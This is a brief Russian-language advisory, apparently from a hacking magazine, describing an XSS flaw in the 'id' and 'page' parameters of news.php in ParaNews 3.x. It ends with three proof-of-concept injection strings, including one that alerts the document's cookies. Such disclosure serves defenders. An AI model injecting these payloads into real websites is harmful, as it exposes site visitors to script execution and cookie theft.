Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: ParaNews 3.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметрах "id" и "page" сценарием news.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.
Эксплоит:
"><script>alert(document.cookie)</script>
"><marquee><h1>abc</h1></marquee>
"><script>alert(1337)</script>